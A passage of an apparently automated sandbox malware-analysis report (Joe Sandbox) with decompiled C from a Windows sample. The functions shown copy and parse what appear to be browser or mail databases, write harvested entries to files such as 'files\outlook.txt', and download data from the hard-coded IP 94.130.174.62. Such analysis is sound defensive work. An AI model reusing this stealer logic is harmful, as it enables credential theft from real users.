                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                				void* _t75;
                                                                                				signed int _t76;
                                                                                				void* _t78;
                                                                                				void* _t80;
                                                                                				void* _t82;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t76 = _t78 - 0x198;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				 *(_t76 + 0x194) = _t24 ^ _t76;
                                                                                				 *((intOrPtr*)(_t76 - 0x80)) =  *((intOrPtr*)(_t76 + 0x1a0));
                                                                                				_t69 = __ecx;
                                                                                				_t55 = __edx;
                                                                                				GetCurrentDirectoryA(0x104, _t76 + 0x90);
                                                                                				 *0x44a1b8(_t76 + 0x90, "\\temp", _t68, _t72, _t54);
                                                                                				CopyFileA(_t69, _t76 + 0x90, 1);
                                                                                				E00427E30(_t76 - 0x74, 0, 0x104);
                                                                                				wsprintfA(_t76 - 0x74, "Downloads\\%s_%s.txt",  *((intOrPtr*)(_t76 - 0x80)), _t55);
                                                                                				_t74 =  *0x44a004; // 0x1498090
                                                                                				_t39 =  *0x44a0a4(_t76 + 0x90, _t76 - 0x7c);
                                                                                				_t80 = _t78 - 0x218 + 0x24;
                                                                                				if(_t39 == 0) {
                                                                                					_t44 =  *0x44a058( *((intOrPtr*)(_t76 - 0x7c)), _t74, 0xffffffff, _t76 - 0x78, 0);
                                                                                					_t82 = _t80 + 0x14;
                                                                                					if(_t44 == 0) {
                                                                                						_t57 = E00420300(_t76 - 0x74, "w");
                                                                                						if(_t57 != 0) {
                                                                                							_t49 =  *0x44a074( *((intOrPtr*)(_t76 - 0x78)));
                                                                                							while(1) {
                                                                                								_t86 = _t49 - 0x64;
                                                                                								if(_t49 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								_t50 =  *0x44a094( *((intOrPtr*)(_t76 - 0x78)), 0);
                                                                                								_t74 = _t50;
                                                                                								E0041E879(_t57, 0, _t50, __eflags);
                                                                                								_t49 =  *0x44a074( *((intOrPtr*)(_t76 - 0x78)), _t57, "%s\n%s\n\n", _t50,  *0x44a094( *((intOrPtr*)(_t76 - 0x78)), 1));
                                                                                								_t82 = _t82 + 0x24;
                                                                                							}
                                                                                							_push(_t57);
                                                                                							E0041EAA2(_t57, 0, _t74, _t86);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t76 - 0x78)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t76 - 0x7c)));
                                                                                				}
                                                                                				_t41 = DeleteFileA(_t76 + 0x90);
                                                                                				_pop(_t71);
                                                                                				_pop(_t75);
                                                                                				_pop(_t56);
                                                                                				return E0041DEB4(_t41, _t56,  *(_t76 + 0x194) ^ _t76, _t67, _t71, _t75);
                                                                                			}


























                                                                                0x00410639
                                                                                0x0041063a
                                                                                0x00410647
                                                                                0x0041064e
                                                                                0x0041065d
                                                                                0x0041066d
                                                                                0x0041066f
                                                                                0x00410671
                                                                                0x00410683
                                                                                0x00410693
                                                                                0x004106a1
                                                                                0x004106b3
                                                                                0x004106b9
                                                                                0x004106ca
                                                                                0x004106d0
                                                                                0x004106d5
                                                                                0x004106e6
                                                                                0x004106ec
                                                                                0x004106f1
                                                                                0x00410701
                                                                                0x00410707
                                                                                0x0041070c
                                                                                0x00410745
                                                                                0x00410745
                                                                                0x00410748
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410719
                                                                                0x00410724
                                                                                0x00410734
                                                                                0x0041073c
                                                                                0x00410742
                                                                                0x00410742
                                                                                0x0041074a
                                                                                0x0041074b
                                                                                0x00410750
                                                                                0x00410707
                                                                                0x00410754
                                                                                0x0041075d
                                                                                0x00410764
                                                                                0x0041076c
                                                                                0x00410778
                                                                                0x00410779
                                                                                0x0041077c
                                                                                0x00410789

                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?), ref: 00410671
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 00410683
                                                                                • CopyFileA.KERNEL32 ref: 00410693
                                                                                • _memset.LIBCMT ref: 004106A1
                                                                                • wsprintfA.USER32 ref: 004106B3
                                                                                • DeleteFileA.KERNEL32(?), ref: 0041076C
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • _fprintf.LIBCMT ref: 00410734
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memsetlstrcatwsprintf
                                                                                • String ID: %s%s$Downloads\%s_%s.txt$\temp
                                                                                • API String ID: 2003248957-2902098628
                                                                                • Opcode ID: 10a316f53b1d713247eaf26388e9575f214ff18326f33f647ff6aa08b3d5e49c
                                                                                • Instruction ID: d0b772d3446a144e0e8b2f786391cf3ddfe19688f3e22923ccd0821d81ed220e
                                                                                • Opcode Fuzzy Hash: 10a316f53b1d713247eaf26388e9575f214ff18326f33f647ff6aa08b3d5e49c
                                                                                • Instruction Fuzzy Hash: 62319576940108AFDB209FB5EC48EDE7BBCEF05315F10003AF619D3152EA7999948F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00413C5A(void* __ebx) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t2;
                                                                                				struct HINSTANCE__* _t3;
                                                                                				void* _t18;
                                                                                				intOrPtr _t20;
                                                                                				void* _t22;
                                                                                				intOrPtr _t28;
                                                                                				intOrPtr _t29;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr _t31;
                                                                                				intOrPtr _t32;
                                                                                				intOrPtr _t33;
                                                                                
                                                                                				_t20 =  *0x449ee0; // 0x14a06e0
                                                                                				_t25 = _t20;
                                                                                				if(_t20 == 0) {
                                                                                					L12:
                                                                                					__eflags = 0;
                                                                                					return 0;
                                                                                				}
                                                                                				_push("PATH");
                                                                                				_t2 = E0041F644(__ebx, 0, _t20, _t25);
                                                                                				_t26 = _t2;
                                                                                				if(_t2 != 0) {
                                                                                					_push(0);
                                                                                					_push(_t20);
                                                                                					_t22 = E0040F445(_t2, ";");
                                                                                					_push(0);
                                                                                					_push(E0040F445("PATH=", _t22));
                                                                                					E00420E63(__ebx, _t18, 0, _t22, _t26);
                                                                                					_push(_t22);
                                                                                					E0041EE8B();
                                                                                				}
                                                                                				_t3 = LoadLibraryA( *0x449f78);
                                                                                				 *0x44a09c = _t3;
                                                                                				if(_t3 != 0) {
                                                                                					 *0x44a090 = GetProcAddress(_t3,  *0x449cd0);
                                                                                					 *0x44a0ac = GetProcAddress( *0x44a09c,  *0x449f20);
                                                                                					 *0x44a05c = GetProcAddress( *0x44a09c,  *0x449c40);
                                                                                					 *0x44a084 = GetProcAddress( *0x44a09c,  *0x449bd4);
                                                                                					 *0x44a0a0 = GetProcAddress( *0x44a09c,  *0x44a014);
                                                                                					 *0x44a07c = GetProcAddress( *0x44a09c,  *0x449d44);
                                                                                				}
                                                                                				_t28 =  *0x44a090; // 0x0
                                                                                				if(_t28 == 0) {
                                                                                					goto L12;
                                                                                				} else {
                                                                                					_t29 =  *0x44a0ac; // 0x0
                                                                                					if(_t29 == 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t30 =  *0x44a05c; // 0x0
                                                                                					if(_t30 == 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t31 =  *0x44a0a0; // 0x0
                                                                                					if(_t31 == 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t32 =  *0x44a07c; // 0x0
                                                                                					if(_t32 == 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t33 =  *0x44a084; // 0x0
                                                                                					if(_t33 == 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					return 1;
                                                                                				}
                                                                                			}
















                                                                                0x00413c5b
                                                                                0x00413c64
                                                                                0x00413c66
                                                                                0x00413d62
                                                                                0x00413d62
                                                                                0x00000000
                                                                                0x00413d62
                                                                                0x00413c6c
                                                                                0x00413c71
                                                                                0x00413c77
                                                                                0x00413c79
                                                                                0x00413c7b
                                                                                0x00413c7c
                                                                                0x00413c88
                                                                                0x00413c8a
                                                                                0x00413c96
                                                                                0x00413c97
                                                                                0x00413c9c
                                                                                0x00413c9d
                                                                                0x00413ca2
                                                                                0x00413cab
                                                                                0x00413cb1
                                                                                0x00413cb8
                                                                                0x00413ccf
                                                                                0x00413ce2
                                                                                0x00413cf5
                                                                                0x00413d08
                                                                                0x00413d1b
                                                                                0x00413d28
                                                                                0x00413d28
                                                                                0x00413d2d
                                                                                0x00413d33
                                                                                0x00000000
                                                                                0x00413d35
                                                                                0x00413d35
                                                                                0x00413d3b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00413d3d
                                                                                0x00413d43
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00413d45
                                                                                0x00413d4b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00413d4d
                                                                                0x00413d53
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00413d55
                                                                                0x00413d5b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00413d5f

                                                                                APIs
                                                                                • __wgetenv.LIBCMT ref: 00413C71
                                                                                • LoadLibraryA.KERNEL32(014A10F8,00000104,00413E0B,?,?,?,?,?,?), ref: 00413CAB
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00413CC7
                                                                                • GetProcAddress.KERNEL32 ref: 00413CDA
                                                                                • GetProcAddress.KERNEL32 ref: 00413CED
                                                                                • GetProcAddress.KERNEL32 ref: 00413D00
                                                                                • GetProcAddress.KERNEL32 ref: 00413D13
                                                                                • GetProcAddress.KERNEL32 ref: 00413D26
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000104,00000000,014A06E0,?,?,00413C88,00000000,00440C68,014A06E0,00000000,014A10F8,00000104,00413E0B), ref: 0040F44E
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 0040F463
                                                                                  • Part of subcall function 0040F445: lstrcpy.KERNEL32(00000000,?), ref: 0040F482
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040F489
                                                                                  • Part of subcall function 0040F445: lstrcpy.KERNEL32(00000001,?), ref: 0040F49D
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000001,?,?,?,?,?,?), ref: 0040F4A4
                                                                                  • Part of subcall function 00420E63: __lock.LIBCMT ref: 00420E71
                                                                                  • Part of subcall function 00420E63: __putenv_helper.LIBCMT ref: 00420E80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$lstrlen$lstrcpy$LibraryLoad__lock__putenv_helper__wgetenv
                                                                                • String ID: PATH$PATH=
                                                                                • API String ID: 2068308339-3104081819
                                                                                • Opcode ID: 397a5612f5acb24916ca6c2c871f661c475b863aecbfe5fe112c7ac0194e49bb
                                                                                • Instruction ID: 75994e38a15df25db20486ea45de51005bb769fbd545efdc2794ba4c605e3613
                                                                                • Opcode Fuzzy Hash: 397a5612f5acb24916ca6c2c871f661c475b863aecbfe5fe112c7ac0194e49bb
                                                                                • Instruction Fuzzy Hash: EC210CBDC80610EEDB229F36FC059677FA5F746711318413BE91491230E63A09A0EF6E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E0041C194(void* __ecx, void* __edx, signed short* _a4, long* _a8, signed int* _a12) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v36;
                                                                                				intOrPtr _v44;
                                                                                				intOrPtr _v52;
                                                                                				struct _BY_HANDLE_FILE_INFORMATION _v60;
                                                                                				signed short _v64;
                                                                                				void _v68;
                                                                                				void* _v72;
                                                                                				long _v76;
                                                                                				signed int* _v80;
                                                                                				void* _v84;
                                                                                				long _v88;
                                                                                				void _v92;
                                                                                				long* _v96;
                                                                                				signed short* _v100;
                                                                                				void _v104;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t83;
                                                                                				signed int _t93;
                                                                                				long _t94;
                                                                                				signed short* _t95;
                                                                                				long* _t96;
                                                                                				void* _t97;
                                                                                				long _t115;
                                                                                				void _t120;
                                                                                				signed char _t123;
                                                                                				void* _t133;
                                                                                				signed int _t137;
                                                                                
                                                                                				_t133 = __edx;
                                                                                				_t83 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t83 ^ _t137;
                                                                                				_v100 = _a4;
                                                                                				_v96 = _a8;
                                                                                				_v80 = _a12;
                                                                                				_t134 = __ecx;
                                                                                				_t135 = __edx;
                                                                                				_v72 = __ecx;
                                                                                				_v84 = __edx;
                                                                                				if(GetFileInformationByHandle(__ecx,  &_v60) != 0) {
                                                                                					_t123 = _v60.dwFileAttributes;
                                                                                					_v68 = _t123;
                                                                                					_t13 =  &_v68;
                                                                                					 *_t13 = _v68 & 1;
                                                                                					_v64 = 0;
                                                                                					if( *_t13 != 0) {
                                                                                						_v64 = 1;
                                                                                					}
                                                                                					if((_t123 & 0x00000002) != 0) {
                                                                                						_v64 = _v64 | 0x00000002;
                                                                                					}
                                                                                					if((_t123 & 0x00000004) != 0) {
                                                                                						_v64 = _v64 | 0x00000004;
                                                                                					}
                                                                                					_t93 = _t123 & 0x00000010;
                                                                                					if(_t93 != 0) {
                                                                                						_v64 = _v64 | 0x00000010;
                                                                                					}
                                                                                					if((_t123 & 0x00000020) != 0) {
                                                                                						_v64 = _v64 | 0x00000020;
                                                                                					}
                                                                                					if(_t93 == 0) {
                                                                                						_v64 = _v64 | 0x80000000;
                                                                                					} else {
                                                                                						_v64 = _v64 | 0x40000000;
                                                                                					}
                                                                                					_v64 = _v64 | 0x01000000;
                                                                                					if(_v68 == 0) {
                                                                                						_v64 = _v64 | 0x00800000;
                                                                                					}
                                                                                					_t94 = GetFileSize(_t134, 0);
                                                                                					_v76 = _t94;
                                                                                					if(_t94 > 0x28) {
                                                                                						SetFilePointer(_t134, 0, 0, 0);
                                                                                						_t134 = ReadFile;
                                                                                						ReadFile(ReadFile,  &_v68, 2,  &_v88, 0);
                                                                                						SetFilePointer(_v72, 0x24, 0, 0);
                                                                                						ReadFile(_v72,  &_v104, 4,  &_v88, 0);
                                                                                						if(_v68 == 0x54ad) {
                                                                                							_t115 = _v104;
                                                                                							if(_v76 > _t115 + 0x34) {
                                                                                								SetFilePointer(_v72, _t115, 0, 0);
                                                                                								ReadFile(_v72,  &_v92, 4,  &_v88, 0);
                                                                                								_t120 = _v92;
                                                                                								if(_t120 == 0x5a4d || _t120 == 0x454e || _t120 == 0x454c || _t120 == 0x4550) {
                                                                                									_v64 = _v64 | 0x00400000;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_t135 = _v84;
                                                                                					}
                                                                                					_t95 = _v100;
                                                                                					if(_t95 != 0) {
                                                                                						 *_t95 = _v64;
                                                                                					}
                                                                                					_t96 = _v96;
                                                                                					if(_t96 != 0) {
                                                                                						 *_t96 = _v76;
                                                                                					}
                                                                                					if(_t135 != 0) {
                                                                                						 *_t135 = E0041C10B(_v60.ftLastAccessTime, _v44);
                                                                                						 *((intOrPtr*)(_t135 + 4)) = _t133;
                                                                                						 *((intOrPtr*)(_t135 + 8)) = E0041C10B(_v60.ftLastWriteTime, _v36);
                                                                                						 *((intOrPtr*)(_t135 + 0xc)) = _t133;
                                                                                						 *((intOrPtr*)(_t135 + 0x10)) = E0041C10B(_v60.ftCreationTime, _v52);
                                                                                						 *((intOrPtr*)(_t135 + 0x14)) = _t133;
                                                                                					}
                                                                                					if(_v80 != 0) {
                                                                                						_push(_v36);
                                                                                						_t134 =  &_v64;
                                                                                						_t135 =  &_v68;
                                                                                						E0041C12D( &_v64,  &_v68, _v60.ftLastWriteTime);
                                                                                						 *_v80 = (_v68 & 0x0000ffff) << 0x00000010 | _v64 & 0x0000ffff;
                                                                                					}
                                                                                					_t97 = 0;
                                                                                				} else {
                                                                                					_t97 = 0x200;
                                                                                				}
                                                                                				return E0041DEB4(_t97, 0, _v8 ^ _t137, _t133, _t134, _t135);
                                                                                			}

































                                                                                0x0041c194
                                                                                0x0041c19a
                                                                                0x0041c1a1
                                                                                0x0041c1a7
                                                                                0x0041c1af
                                                                                0x0041c1b6
                                                                                0x0041c1bc
                                                                                0x0041c1bf
                                                                                0x0041c1c2
                                                                                0x0041c1c5
                                                                                0x0041c1d0
                                                                                0x0041c1dc
                                                                                0x0041c1e4
                                                                                0x0041c1e7
                                                                                0x0041c1e7
                                                                                0x0041c1ea
                                                                                0x0041c1ed
                                                                                0x0041c1ef
                                                                                0x0041c1ef
                                                                                0x0041c1f5
                                                                                0x0041c1f7
                                                                                0x0041c1f7
                                                                                0x0041c1fe
                                                                                0x0041c200
                                                                                0x0041c200
                                                                                0x0041c206
                                                                                0x0041c209
                                                                                0x0041c20b
                                                                                0x0041c20b
                                                                                0x0041c212
                                                                                0x0041c214
                                                                                0x0041c214
                                                                                0x0041c21a
                                                                                0x0041c225
                                                                                0x0041c21c
                                                                                0x0041c21c
                                                                                0x0041c21c
                                                                                0x0041c22c
                                                                                0x0041c236
                                                                                0x0041c238
                                                                                0x0041c238
                                                                                0x0041c241
                                                                                0x0041c247
                                                                                0x0041c24d
                                                                                0x0041c25d
                                                                                0x0041c26b
                                                                                0x0041c271
                                                                                0x0041c27a
                                                                                0x0041c28a
                                                                                0x0041c295
                                                                                0x0041c297
                                                                                0x0041c2a0
                                                                                0x0041c2a8
                                                                                0x0041c2b8
                                                                                0x0041c2ba
                                                                                0x0041c2c2
                                                                                0x0041c2d9
                                                                                0x0041c2d9
                                                                                0x0041c2c2
                                                                                0x0041c2a0
                                                                                0x0041c2e0
                                                                                0x0041c2e0
                                                                                0x0041c2e3
                                                                                0x0041c2e8
                                                                                0x0041c2ed
                                                                                0x0041c2ed
                                                                                0x0041c2ef
                                                                                0x0041c2f4
                                                                                0x0041c2f9
                                                                                0x0041c2f9
                                                                                0x0041c2fd
                                                                                0x0041c30d
                                                                                0x0041c312
                                                                                0x0041c31d
                                                                                0x0041c323
                                                                                0x0041c32e
                                                                                0x0041c331
                                                                                0x0041c331
                                                                                0x0041c337
                                                                                0x0041c339
                                                                                0x0041c33c
                                                                                0x0041c342
                                                                                0x0041c345
                                                                                0x0041c35c
                                                                                0x0041c35c
                                                                                0x0041c35e
                                                                                0x0041c1d2
                                                                                0x0041c1d2
                                                                                0x0041c1d2
                                                                                0x0041c36e

                                                                                APIs
                                                                                • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041C1C8
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041C241
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041C25D
                                                                                • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041C271
                                                                                • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041C27A
                                                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041C28A
                                                                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041C2A8
                                                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041C2B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$PointerRead$HandleInformationSize
                                                                                • String ID:
                                                                                • API String ID: 2979504256-3916222277
                                                                                • Opcode ID: d7bcea8a3ed810e61efb2844ff5c01f9d5f4b6e0ead47ce4f4ce520dedbd38fc
                                                                                • Instruction ID: 749df1396252e083767a2290ce791a9194bbe4c11cd21ffb88b2f6a14314418b
                                                                                • Opcode Fuzzy Hash: d7bcea8a3ed810e61efb2844ff5c01f9d5f4b6e0ead47ce4f4ce520dedbd38fc
                                                                                • Instruction Fuzzy Hash: B451F3B1D40218AFDB28DFD9DC85AEEBBB9EB08304F10446AE511E7260D7789D85CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E0040EF26(char* __ecx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t21;
                                                                                				void* _t25;
                                                                                				void* _t31;
                                                                                				void* _t37;
                                                                                				void* _t38;
                                                                                				char* _t46;
                                                                                				void* _t47;
                                                                                				void* _t48;
                                                                                				void* _t51;
                                                                                				signed int _t52;
                                                                                				void* _t54;
                                                                                
                                                                                				_t52 = _t54 - 0x394;
                                                                                				_t21 =  *0x447674; // 0x4124c941
                                                                                				 *(_t52 + 0x390) = _t21 ^ _t52;
                                                                                				_t46 = __ecx;
                                                                                				 *(_t52 - 0x74) = 1;
                                                                                				_t37 = HeapAlloc(GetProcessHeap(), 0, 0x5f5e0ff);
                                                                                				_t25 = InternetOpenA(0x43e028, 0, 0, 0, 0);
                                                                                				 *(_t52 - 0x78) = _t25;
                                                                                				 *(_t52 - 0x80) = 0x927c0;
                                                                                				InternetSetOptionA(_t25, 2, _t52 - 0x80, 4);
                                                                                				 *(_t52 - 0x7c) = InternetOpenUrlA( *(_t52 - 0x78), _t46, 0, 0, 0x4000100, 0);
                                                                                				_t47 = 0;
                                                                                				while( *(_t52 - 0x74) > 0) {
                                                                                					InternetReadFile( *(_t52 - 0x7c), _t52 - 0x70, 0x400, _t52 - 0x74);
                                                                                					_t31 = 0;
                                                                                					if( *(_t52 - 0x74) > 0) {
                                                                                						do {
                                                                                							 *((char*)(_t47 + _t37)) =  *((intOrPtr*)(_t52 + _t31 - 0x70));
                                                                                							_t47 = _t47 + 1;
                                                                                							_t31 = _t31 + 1;
                                                                                						} while (_t31 <  *(_t52 - 0x74));
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				InternetCloseHandle( *(_t52 - 0x7c));
                                                                                				InternetCloseHandle( *(_t52 - 0x78));
                                                                                				_pop(_t48);
                                                                                				_pop(_t51);
                                                                                				_pop(_t38);
                                                                                				return E0041DEB4(_t37, _t38,  *(_t52 + 0x390) ^ _t52, _t47, _t48, _t51);
                                                                                			}

















                                                                                0x0040ef27
                                                                                0x0040ef34
                                                                                0x0040ef3b
                                                                                0x0040ef4c
                                                                                0x0040ef4e
                                                                                0x0040ef6b
                                                                                0x0040ef6d
                                                                                0x0040ef7c
                                                                                0x0040ef7f
                                                                                0x0040ef86
                                                                                0x0040ef9e
                                                                                0x0040efa1
                                                                                0x0040efd0
                                                                                0x0040efb5
                                                                                0x0040efbb
                                                                                0x0040efc0
                                                                                0x0040efc2
                                                                                0x0040efc6
                                                                                0x0040efc9
                                                                                0x0040efca
                                                                                0x0040efcb
                                                                                0x00000000
                                                                                0x0040efc2
                                                                                0x00000000
                                                                                0x0040efc0
                                                                                0x0040efd8
                                                                                0x0040efe1
                                                                                0x0040efef
                                                                                0x0040eff0
                                                                                0x0040eff5
                                                                                0x0040f002

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF,94.130.174.62,00000000,00000000), ref: 0040EF55
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040EF5C
                                                                                • InternetOpenA.WININET(0043E028,00000000,00000000,00000000,00000000), ref: 0040EF6D
                                                                                • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 0040EF86
                                                                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 0040EF98
                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 0040EFB5
                                                                                • InternetCloseHandle.WININET(?), ref: 0040EFD8
                                                                                • InternetCloseHandle.WININET(?), ref: 0040EFE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHeapOpen$AllocFileOptionProcessRead
                                                                                • String ID: 94.130.174.62
                                                                                • API String ID: 891040511-384399413
                                                                                • Opcode ID: 878709bd005b3029b6d617eaceff7e15be5b9930906d2b05fdf27e83d4c08367
                                                                                • Instruction ID: 1f73ae765ea78ab5668d243b99c32d2340bec995ce60702b1ba3443bd60daa3a
                                                                                • Opcode Fuzzy Hash: 878709bd005b3029b6d617eaceff7e15be5b9930906d2b05fdf27e83d4c08367
                                                                                • Instruction Fuzzy Hash: 7B219A71941128AFEB309FB6DC08ADEBFB9EB4A710F20053AF105A3251CA740914CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 70%
                                                                                			E004035ED(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _t29;
                                                                                				void* _t30;
                                                                                				intOrPtr* _t39;
                                                                                				intOrPtr* _t42;
                                                                                				intOrPtr* _t43;
                                                                                				intOrPtr* _t46;
                                                                                				void* _t49;
                                                                                				char* _t62;
                                                                                				void* _t66;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t69;
                                                                                				void* _t70;
                                                                                
                                                                                				_t70 = __eflags;
                                                                                				_push(0x54);
                                                                                				E004219DE(E004374EC, __ebx, __edi, __esi);
                                                                                				_t59 = _t67 - 0x50;
                                                                                				E004032BE(__ebx, __ecx, _t67 - 0x50, __edi, __esi, _t70, _t67 - 0x60);
                                                                                				 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
                                                                                				_t29 = E004037E9(_t67 - 0x30, L"files\\outlook.txt");
                                                                                				if( *((intOrPtr*)(_t29 + 0x14)) >= 8) {
                                                                                					_t29 =  *_t29;
                                                                                				}
                                                                                				_t30 = E0041E704(_t29, L"a+");
                                                                                				_t65 = _t67 - 0x30;
                                                                                				_t49 = _t30;
                                                                                				E00403960(0, _t67 - 0x30, 1);
                                                                                				_t62 =  *(_t67 - 0x50);
                                                                                				_t72 = _t62;
                                                                                				if(_t62 > 0) {
                                                                                					_push("\n");
                                                                                					_push(_t49);
                                                                                					E0041E879(_t49, _t62, _t65, _t72);
                                                                                					if(_t62 > 0) {
                                                                                						 *(_t67 - 0x50) = _t62;
                                                                                						_t66 = 0;
                                                                                						_t62 = "%s\n";
                                                                                						do {
                                                                                							_t12 =  *((intOrPtr*)(_t67 - 0x60)) + 4; // 0x4
                                                                                							_t39 = _t66 + _t12;
                                                                                							_t75 =  *((intOrPtr*)(_t39 + 0x14)) - 0x10;
                                                                                							if( *((intOrPtr*)(_t39 + 0x14)) >= 0x10) {
                                                                                								_t39 =  *_t39;
                                                                                							}
                                                                                							_push(_t39);
                                                                                							_push("%s : ");
                                                                                							_push(_t49);
                                                                                							E0041E879(_t49, _t62, _t66, _t75);
                                                                                							_t42 =  *((intOrPtr*)(_t67 - 0x60)) + _t66;
                                                                                							_t69 = _t68 + 0xc;
                                                                                							if( *_t42 == 4) {
                                                                                								_push( *((intOrPtr*)(_t42 + 0x40)));
                                                                                								_t43 = E00417463(_t49, _t67 - 0x4c, _t59, _t62, _t66, __eflags);
                                                                                								__eflags =  *((intOrPtr*)(_t43 + 0x14)) - 0x10;
                                                                                								if(__eflags >= 0) {
                                                                                									_t43 =  *_t43;
                                                                                								}
                                                                                								_push(_t43);
                                                                                								_push(_t62);
                                                                                								_push(_t49);
                                                                                								E0041E879(_t49, _t62, _t66, __eflags);
                                                                                								_t68 = _t69 + 0xc;
                                                                                								E00402C34(_t67 - 0x4c, 1, 0);
                                                                                							} else {
                                                                                								_t46 = _t42 + 0x20;
                                                                                								_t77 =  *((intOrPtr*)(_t46 + 0x14)) - 0x10;
